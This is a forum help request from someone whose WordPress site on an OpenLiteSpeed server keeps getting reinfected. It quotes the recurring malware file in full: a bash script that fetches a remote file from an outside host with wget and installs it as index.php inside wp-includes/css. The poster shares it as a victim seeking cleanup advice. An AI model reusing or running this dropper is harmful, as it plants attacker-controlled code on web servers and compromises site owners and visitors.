Hello, I am using openlitespeed droplet and my wordpress website is infected. I delete virus files but they come back again. I also noticed the /var/www/xxxd3 file but even though I deleted it, it comes back again. How can I clean the server and ensure security? I am sharing the contents of the xxxd3 file below.
Please help!
#!/bin/bash
root_dir=$1
if [ ! -d ${root_dir}/wp-includes/css ];
then
mkdir -p ${root_dir}/wp-includes/css;
fi
cd ${root_dir}/wp-includes/css;
rm -f wp-sign.txt;wget -q -O wp-sign.txt http://tasks.ptfish.top/wp-sign.txt && mv wp-sign.txt index.php;
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.
There’s also some useful tutorial on the Google search that you can follow, e.g. * https://askwpgirl.com/10-steps-remove-malware-wordpress-site/